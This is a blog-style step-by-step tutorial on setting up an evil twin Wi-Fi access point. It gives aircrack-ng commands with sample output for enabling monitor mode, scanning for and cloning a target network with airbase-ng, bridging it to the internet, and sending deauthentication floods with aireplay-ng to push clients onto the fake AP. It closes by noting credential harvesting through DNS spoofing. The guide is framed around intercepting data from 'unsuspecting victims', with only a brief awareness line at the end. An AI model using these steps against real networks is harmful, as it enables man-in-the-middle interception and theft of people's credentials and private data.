Step-by-Step Guide: Creating an Evil TwinAn Evil Twin Access Point is a malicious Wireless access point that is set up to mimic a legitimate one. It can be used to intercept sensitive information such as login credentials, credit card information, and other private data.In this post, I will provide a step-by-step guide on how to create an Evil Twin Access Point. You will learn how to set up a fake access point that looks like the real one, and how to intercept data from unsuspecting victims.Follow our guide and learn how to create an Evil Twin Access Point in just a few easy steps.*What is an Evil Twin Access Point?*An evil twin is a fake wireless access point that appears as a genuine hotspot offered by a legitimate provider. The idea is to set up a malicious wireless network with the same SSID name as the original one.Devices connecting to a Wi-Fi network like laptops, tablets, and smartphones have no way to distinguish between two Wi-Fi networks with the same SSID name. This enables hackers to set up malicious wireless networks that can capture traffic and extract sensitive information from victims.*Enable Monitor Mode*To start with this tutorial, ensure that your wireless card is compatible with the aircrack-ng suite and has monitor mode enabled.Aircrack-ng is a popular set of tools used to crack wireless networks. It is a suite of tools that includes aircrack-ng (for cracking WEP and WPA-PSK keys), airmon-ng (for setting up monitor mode on wireless cards), and airodump-ng (for capturing wireless traffic).Aircrack-ng is an open-source project and is available for Windows, Linux, and macOS. You can verify if it's functioning correctly by entering the following command:airmon-ng check killThis command will check if the wireless card is supported by the aircrack-ng suite and also disable any processes that may interfere with it.The next step is to enable monitor mode on your wireless interface. This can be accomplished by executing the airmon-ng start wlan0 command.airmon-ng start wlan0This will change wlan0 to wlan0mon, which indicates that your wireless interface is now in monitor mode.*Locate the Target Wireless Network*The second step is to start scanning nearby wireless routers and locate the Wi-Fi network which you want to clone. Execute the following command:airodump-ng wlan0monCH 6][ BAT: 3 hours 9 mins ][ Elapsed: 8 s ][ 2014-05-20 11:10BSSID PWR Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID28:EF:01:34:64:92 -29 19 1 0 6 54e WPA2 CCMP PSK Linksys28:EF:01:35:34:85 -42 17 0 0 6 54e WPA2 CCMP PSK SkyNet28:EF:01:34:64:91 -29 19 1 0 1 54e WPA2 CCMP PSK TP-LINK28:EF:02:33:38:86 -42 17 0 0 11 54e WPA2 CCMP PSK CISCO-NetBSSID STATION PWR Rate Lost Packets Probes28:EF:01:35:34:85 28:EF:01:23:46:68 -57 0 - 1 0 1The wireless network I will be cloning in this tutorial is the SkyNet network with BSSID 28:EF:01:35:34:85 and channel 6.Create the Evil TwinOnce you’ve found the network which you wish to clone, run the following command in another terminal:airbase-ng -a 28:EF:01:35:34:85 –e SkyNet -c 6 wlan0mon$ airbase-ng -a 28:EF:01:35:34:85 --essid SkyNet -c 6 wlan0mon21:39:29 Created tap interface at021:39:29 Trying to set MTU on at0 to 150021:39:29 Trying to set MTU on wlan0mon to 180021:39:29 Access Point with BSSID 28:EF:01:35:34:85 started.This command creates an Evil Twin network with the SSID name SkyNet, however, it will not be able to provide internet access yet.Provide Internet Access to the Evil TwinI will add the bridge interface, called fake, you can name it any way you like.brctl addbr fakeNow add the two interfaces you’re bridging, eth0 and at0 (make sure eth0 has internet access).brctl addif fake eth0brctl addif fake at0Assign IP addresses to the interface and bring them up using ifconfig:ifconfig at0 0.0.0.0 upifconfig fake upYou can take a look at the bridge network interface with ifconfig:ifconfigat0 Link encap:Ethernet HWaddr 74:85:2a inet6 addr: fe80::7685:2aff:5b08/64 Scope:LinkUP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1RX packets:4 errors:0 dropped:0 overruns:0 frame:0TX packets:349 errors:0 dropped:0 overruns:0 carrier:0collisions:0 txqueuelen:500 RX bytes:540 (540.0 B) TX bytes:54845 (53.3 KiB)eth0 Link encap:Ethernet HWaddr c8:bc:c8inet addr:10.0.0.19 Bcast:10.0.0.255 Mask:255.255.255.0inet6 addr: fe80::cabc:a6c1/64 Scope:LinkUP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1RX packets:640 errors:0 dropped:0 overruns:0 frame:0TX packets:529 errors:0 dropped:0 overruns:0 carrier:0collisions:0 txqueuelen:1000RX bytes:457344 (446.6 KiB) TX bytes:94347 (92.2 KiB)Interrupt:17fake Link encap:Ethernet HWaddr 74:85:2ainet addr:10.0.0.194 Bcast:10.0.0.255 Mask:255.255.255.0inet6 addr: fe80:::fe97:5b08/64 Scope:Linkinet6 addr: 2601:d335:7685:2aff:fe97:5b08/64 Scope:GlobalUP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1RX packets:859 errors:0 dropped:0 overruns:0 frame:0TX packets:684 errors:0 dropped:0 overruns:0 carrier:0collisions:0 txqueuelen:0RX bytes:492405 (480.8 KiB) TX bytes:130130 (127.0 KiB)*Kick Wireless Clients from the Legitimate AP*The next step is to kick wireless clients off the legitimate AP, in my case, that’s SkyNet network. You can do this by using aireplay-ng.aireplay-ng --deauth 1000 -a 28:EF:01:35:34:85 wlan0monThis command kicks wireless clients from the real access point network, forcing them to connect to the malicious access point.As you can see in the output below, a client has associated with my evil twin. This information is found in the airebase-ng terminal (client 28:EF:01:23:46:68 associated).$ airbase-ng -a 28:EF:01:35:34:85 --essid SkyNet -c 6 wlan0mon14:50:56 Created tap interface at014:50:56 Trying to set MTU on at0 to 150014:50:56 Trying to set MTU on wlan5 to 180014:50:56 Access Point with BSSID 28:EF:01:35:34:85 started.14:58:55 Client 28:EF:01:23:46:68 associated (WPA2;CCMP) to ESSID: "SkyNet"15:03:24 Client 28:EF:01:23:46:68 associated (WPA2;CCMP) to ESSID: "SkyNet"At this point, all the victim’s traffic is going through the attacker’s machine, he or she can capture sensitive information since it’s technically a Man-in-the-Middle attack.The attacker can perform various attacks like DNS spoofing which redirects the victim to a cloned or fake login page. Once the victim tries to login, the hacker harvests the credentials.ConclusionIn today's digital age, using public Wi-Fi networks has become a common practice for many people. However, it's important to be aware of the risks associated with connecting to these networks, as they can be vulnerable to cyber-attacks and hacking attempts.